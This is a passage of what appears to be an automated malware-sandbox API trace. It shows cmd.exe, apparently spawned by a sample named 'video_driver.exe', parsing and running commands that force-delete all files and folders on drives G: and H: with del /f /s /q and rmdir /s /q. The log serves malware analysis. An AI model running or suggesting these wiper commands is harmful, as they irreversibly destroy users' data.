dwLength=0x1c | out: lpBuffer=0x32fa84*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.159] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32fa84, dwLength=0x1c | out: lpBuffer=0x32fa84*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0067.159] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32fa84, dwLength=0x1c | out: lpBuffer=0x32fa84*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0067.159] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32fa84, dwLength=0x1c | out: lpBuffer=0x32fa84*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.159] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32fa84, dwLength=0x1c | out: lpBuffer=0x32fa84*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.159] GetConsoleOutputCP () returned 0x1b5 [0067.159] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.160] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0067.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.160] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0067.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.160] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.160] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.160] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.160] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.161] GetEnvironmentStringsW () returned 0x3920f8* [0067.161] GetProcessHeap () returned 0x380000 [0067.161] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xaca) returned 0x392bd0 [0067.161] FreeEnvironmentStringsW (penv=0x3920f8) returned 1 [0067.161] GetProcessHeap () returned 0x380000 [0067.161] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x4) returned 0x391898 [0067.161] GetEnvironmentStringsW () returned 0x3920f8* [0067.161] GetProcessHeap () returned 0x380000 [0067.161] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xaca) returned 0x3936a8 [0067.161] FreeEnvironmentStringsW (penv=0x3920f8) returned 1 [0067.162] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32ea24 | out: phkResult=0x32ea24*=0x68) returned 0x0 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x0, lpData=0x32ea30*=0x0, lpcbData=0x32ea28*=0x1000) returned 0x2 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x4, lpData=0x32ea30*=0x1, lpcbData=0x32ea28*=0x4) returned 0x0 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x0, lpData=0x32ea30*=0x1, lpcbData=0x32ea28*=0x1000) returned 0x2 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x4, lpData=0x32ea30*=0x0, lpcbData=0x32ea28*=0x4) returned 0x0 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x4, lpData=0x32ea30*=0x40, lpcbData=0x32ea28*=0x4) returned 0x0 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x4, lpData=0x32ea30*=0x40, lpcbData=0x32ea28*=0x4) returned 0x0 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x0, lpData=0x32ea30*=0x40, lpcbData=0x32ea28*=0x1000) returned 0x2 [0067.162] RegCloseKey (hKey=0x68) returned 0x0 [0067.162] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32ea24 | out: phkResult=0x32ea24*=0x68) returned 0x0 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x0, lpData=0x32ea30*=0x40, lpcbData=0x32ea28*=0x1000) returned 0x2 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x4, lpData=0x32ea30*=0x1, lpcbData=0x32ea28*=0x4) returned 0x0 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x0, lpData=0x32ea30*=0x1, lpcbData=0x32ea28*=0x1000) returned 0x2 [0067.162] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x4, lpData=0x32ea30*=0x0, lpcbData=0x32ea28*=0x4) returned 0x0 [0067.163] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x4, lpData=0x32ea30*=0x9, lpcbData=0x32ea28*=0x4) returned 0x0 [0067.163] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x4, lpData=0x32ea30*=0x9, lpcbData=0x32ea28*=0x4) returned 0x0 [0067.163] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32ea2c, lpData=0x32ea30, lpcbData=0x32ea28*=0x1000 | out: lpType=0x32ea2c*=0x0, lpData=0x32ea30*=0x9, lpcbData=0x32ea28*=0x1000) returned 0x2 [0067.163] RegCloseKey (hKey=0x68) returned 0x0 [0067.163] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6d [0067.163] srand (_Seed=0x5eb34b6d) [0067.163] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"G:\" del /f /s /q \"G:\" & FOR /D %p IN (\"G:\") DO rmdir \"%p\" /s /q" [0067.163] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"G:\" del /f /s /q \"G:\" & FOR /D %p IN (\"G:\") DO rmdir \"%p\" /s /q" [0067.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.163] GetProcessHeap () returned 0x380000 [0067.163] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x210) returned 0x3920f8 [0067.163] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x392100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0067.163] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.163] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.164] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.164] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0067.164] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0067.164] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0067.164] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0067.164] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0067.164] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0067.164] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0067.164] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.164] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0067.164] GetProcessHeap () returned 0x380000 [0067.164] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x392bd0 | out: hHeap=0x380000) returned 1 [0067.164] GetEnvironmentStringsW () returned 0x392310* [0067.164] GetProcessHeap () returned 0x380000 [0067.164] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xae2) returned 0x394c70 [0067.164] FreeEnvironmentStringsW (penv=0x392310) returned 1 [0067.164] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.164] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.164] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0067.164] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0067.164] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0067.164] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0067.164] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0067.164] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0067.164] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0067.164] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0067.165] GetProcessHeap () returned 0x380000 [0067.165] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x54) returned 0x3917c8 [0067.165] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f7f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f7f0, lpFilePart=0x32f7ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f7ec*="Desktop") returned 0x25 [0067.165] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.165] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f56c | out: lpFindFileData=0x32f56c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x395760 [0067.165] FindClose (in: hFindFile=0x395760 | out: hFindFile=0x395760) returned 1 [0067.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f56c | out: lpFindFileData=0x32f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x395760 [0067.165] FindClose (in: hFindFile=0x395760 | out: hFindFile=0x395760) returned 1 [0067.165] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0067.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f56c | out: lpFindFileData=0x32f56c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x395760 [0067.165] FindClose (in: hFindFile=0x395760 | out: hFindFile=0x395760) returned 1 [0067.165] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.166] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0067.166] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0067.166] GetProcessHeap () returned 0x380000 [0067.166] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x394c70 | out: hHeap=0x380000) returned 1 [0067.166] GetEnvironmentStringsW () returned 0x394180* [0067.166] GetProcessHeap () returned 0x380000 [0067.166] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xb36) returned 0x395fa0 [0067.166] FreeEnvironmentStringsW (penv=0x394180) returned 1 [0067.166] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.166] GetProcessHeap () returned 0x380000 [0067.166] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x3917c8 | out: hHeap=0x380000) returned 1 [0067.166] GetProcessHeap () returned 0x380000 [0067.166] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x400e) returned 0x396ae0 [0067.167] GetProcessHeap () returned 0x380000 [0067.167] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xa0) returned 0x392e50 [0067.167] GetProcessHeap () returned 0x380000 [0067.167] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x396ae0 | out: hHeap=0x380000) returned 1 [0067.167] GetConsoleOutputCP () returned 0x1b5 [0067.167] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.167] GetUserDefaultLCID () returned 0x409 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f930, cchData=128 | out: lpLCData="0") returned 2 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f930, cchData=128 | out: lpLCData="0") returned 2 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f930, cchData=128 | out: lpLCData="1") returned 2 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0067.182] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0067.183] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0067.184] GetProcessHeap () returned 0x380000 [0067.184] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x20c) returned 0x392ef8 [0067.184] GetConsoleTitleW (in: lpConsoleTitle=0x392ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0067.184] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.184] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0067.185] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0067.185] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0067.185] GetProcessHeap () returned 0x380000 [0067.185] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x400a) returned 0x396ae0 [0067.185] GetProcessHeap () returned 0x380000 [0067.185] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x4008) returned 0x39aaf8 [0067.185] GetProcessHeap () returned 0x380000 [0067.186] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1a) returned 0x3957e0 [0067.186] GetEnvironmentVariableW (in: lpName="p IN (\"G", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.186] _wcsicmp (_String1="p IN (\"G", _String2="CD") returned 13 [0067.186] _wcsicmp (_String1="p IN (\"G", _String2="ERRORLEVEL") returned 11 [0067.186] _wcsicmp (_String1="p IN (\"G", _String2="CMDEXTVERSION") returned 13 [0067.186] _wcsicmp (_String1="p IN (\"G", _String2="CMDCMDLINE") returned 13 [0067.186] _wcsicmp (_String1="p IN (\"G", _String2="DATE") returned 12 [0067.186] _wcsicmp (_String1="p IN (\"G", _String2="TIME") returned -4 [0067.186] _wcsicmp (_String1="p IN (\"G", _String2="RANDOM") returned -2 [0067.186] _wcsicmp (_String1="p IN (\"G", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.186] GetProcessHeap () returned 0x380000 [0067.186] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x3957e0 | out: hHeap=0x380000) returned 1 [0067.186] GetProcessHeap () returned 0x380000 [0067.186] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39aaf8 | out: hHeap=0x380000) returned 1 [0067.186] GetProcessHeap () returned 0x380000 [0067.186] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x4008) returned 0x39aaf8 [0067.186] GetProcessHeap () returned 0x380000 [0067.186] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39aaf8 | out: hHeap=0x380000) returned 1 [0067.186] GetProcessHeap () returned 0x380000 [0067.186] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x396ae0 | out: hHeap=0x380000) returned 1 [0067.186] _wcsicmp (_String1="if", _String2=")") returned 64 [0067.186] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0067.186] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0067.186] _wcsicmp (_String1="IF", _String2="if") returned 0 [0067.187] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0067.187] GetProcessHeap () returned 0x380000 [0067.187] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393110 [0067.187] GetProcessHeap () returned 0x380000 [0067.187] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xe) returned 0x38ffc0 [0067.187] GetProcessHeap () returned 0x380000 [0067.187] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x20) returned 0x3957e0 [0067.187] GetProcessHeap () returned 0x380000 [0067.188] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x3957e0, Size=0x16) returned 0x391800 [0067.188] GetProcessHeap () returned 0x380000 [0067.188] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x391800) returned 0x16 [0067.188] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0067.188] GetProcessHeap () returned 0x380000 [0067.188] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393170 [0067.188] GetProcessHeap () returned 0x380000 [0067.188] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x14) returned 0x3931d0 [0067.188] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0067.188] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0067.188] GetProcessHeap () returned 0x380000 [0067.188] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x12) returned 0x3931f0 [0067.188] GetProcessHeap () returned 0x380000 [0067.189] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1c) returned 0x3957e0 [0067.189] GetProcessHeap () returned 0x380000 [0067.189] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x3957e0, Size=0x14) returned 0x393210 [0067.189] GetProcessHeap () returned 0x380000 [0067.189] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x393210) returned 0x14 [0067.189] _wcsicmp (_String1="del", _String2=")") returned 59 [0067.189] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0067.189] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0067.189] _wcsicmp (_String1="IF", _String2="del") returned 5 [0067.189] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0067.189] _wcsicmp (_String1="REM", _String2="del") returned 14 [0067.189] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0067.189] GetProcessHeap () returned 0x380000 [0067.189] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393230 [0067.189] GetProcessHeap () returned 0x380000 [0067.189] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x10) returned 0x38ffd8 [0067.190] GetProcessHeap () returned 0x380000 [0067.190] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x28) returned 0x393290 [0067.190] GetProcessHeap () returned 0x380000 [0067.190] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x3932c0 [0067.190] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0067.190] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0067.191] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0067.191] GetProcessHeap () returned 0x380000 [0067.191] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393320 [0067.191] GetProcessHeap () returned 0x380000 [0067.191] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x44) returned 0x393380 [0067.191] GetProcessHeap () returned 0x380000 [0067.191] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x14) returned 0x3933d0 [0067.191] GetProcessHeap () returned 0x380000 [0067.191] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x3933d0, Size=0x12) returned 0x3933d0 [0067.191] GetProcessHeap () returned 0x380000 [0067.191] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x3933d0) returned 0x12 [0067.191] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0067.191] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0067.192] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0067.192] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0067.192] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0067.192] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0067.192] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0067.192] GetProcessHeap () returned 0x380000 [0067.192] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x12) returned 0x3933f0 [0067.193] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0067.193] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0067.193] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0067.193] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0067.193] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0067.193] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0067.193] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0067.193] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0067.193] GetProcessHeap () returned 0x380000 [0067.193] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393410 [0067.193] GetProcessHeap () returned 0x380000 [0067.193] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x14) returned 0x393470 [0067.194] GetProcessHeap () returned 0x380000 [0067.194] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x20) returned 0x3957e0 [0067.195] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0067.196] GetFullPathNameW (in: lpFileName="G:", nBufferLength=0x208, lpBuffer=0x32f620, lpFilePart=0x32f3cc | out: lpBuffer="G:\\", lpFilePart=0x32f3cc*=0x0) returned 0x3 [0067.197] wcsncmp (_String1="G:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -21 [0067.200] GetFileAttributesW (lpFileName="G:\\" (normalized: "g:")) returned 0xffffffff [0067.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.201] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.201] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.201] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.201] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.201] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.202] SetConsoleInputExeNameW () returned 0x1 [0067.202] GetConsoleOutputCP () returned 0x1b5 [0067.202] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.202] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.202] exit (_Code=0) Process: id = "52" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42a63000" os_pid = "0x9d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"H:\" del /f /s /q \"H:\" & FOR /D %p IN (\"H:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS 